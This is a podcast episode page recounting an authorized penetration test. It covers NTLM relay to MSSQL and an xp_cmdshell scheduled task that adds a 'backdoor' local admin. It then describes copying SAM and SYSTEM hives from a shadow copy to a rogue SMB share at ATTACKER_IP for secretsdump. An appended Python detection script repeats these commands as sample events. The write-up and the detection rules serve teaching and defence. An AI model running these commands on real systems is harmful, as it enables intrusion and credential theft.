
7MS #692: Tales of Pentest Pwnage – Part 76

7 Minute Security

Release Date: 09/12/2025


Happy Friday! Today’s another hot pile of pentest pwnage. To make it easy on myself I’m going to share the whole narrative that I wrote up for someone else:

I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.

I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can’t explain is that the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCKED me from making that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net localgroup administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance".

Turns out a DA wasn’t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP into the victim and create a shadow copy. That part went fine, but for the life of me I couldn’t copy reg hives out of it – EDR was unhappy.

In the end, the bizarre combo of things that did the trick was:

  • Set up smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!'
  • From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\
  • From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL!
  • Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However… the copy completed!
  • I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!!
  • Finishing move: secretsdump -sam sam.test -system sys.test LOCAL
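From the defender’s side, the whole chain above leaves a very recognizable trail in process-creation telemetry: the SQL Server service spawning cmd.exe (xp_cmdshell), a schtasks /create running as SYSTEM that adds a local admin, an mklink into a shadow copy, and a copy of a registry hive to a UNC path. The following is an added example (not code from the episode) that runs a few such rules over constructed Sysmon-style events; the file paths and the attacker.example / fileserver.example hosts are placeholders.

```python
import re

# Constructed sample process-creation events (Sysmon event ID 1 style, reduced to the
# fields the rules need). They model the command chain described above; hosts are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c schtasks /create /tn "Maintenance" /tr "net localgroup administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f'},
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c schtasks /run /tn "Maintenance"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"copy C:\tempbackup\Windows\System32\config\SYSTEM \\attacker.example\share\sys.test"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"copy C:\Users\bob\report.docx \\fileserver.example\share\report.docx"},  # benign
]

# Each rule is (parent regex, image regex, command-line regex); all three must match.
RULES = {
    # xp_cmdshell: cmd.exe whose parent is the SQL Server service process.
    "sql_server_spawned_shell": (r"\\sqlservr\.exe$", r"\\cmd\.exe$", r""),
    # Scheduled task created to run as SYSTEM whose action adds a member to local Administrators.
    "schtasks_system_localgroup_add": (r"", r"",
        r"schtasks\s+/create\b(?=.*/ru\s+system\b)(?=.*\bnet\s+localgroup\s+administrators\b)"),
    # Directory symlink pointed at a Volume Shadow Copy device path.
    "shadow_copy_symlink": (r"", r"",
        r"mklink\b.*\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+"),
    # SAM/SYSTEM/SECURITY hive copied to a UNC path (hive exfil over SMB).
    "hive_copied_to_unc_path": (r"", r"",
        r"\bcopy\s+(?:\S*\\)?(?:SAM|SYSTEM|SECURITY)\s+\\\\[^\s\\]+\\"),
}
COMPILED = {name: tuple(re.compile(p, re.IGNORECASE) for p in pats) for name, pats in RULES.items()}


def scan(events):
    """Return (event_index, rule_name) pairs for every rule that fires on each event."""
    hits = []
    for i, ev in enumerate(events):
        for name, (p_re, i_re, c_re) in COMPILED.items():
            if p_re.search(ev["parent"]) and i_re.search(ev["image"]) and c_re.search(ev["cmd"]):
                hits.append((i, name))
    return hits


def chain_complete(events):
    """True when every stage fired on one host: relay-driven shell, SYSTEM task for local
    admin, shadow-copy link, and hive copy to a remote share. Any single stage alone is
    worth a look; all four together is the story told above."""
    return {name for _, name in scan(events)} == set(RULES)
```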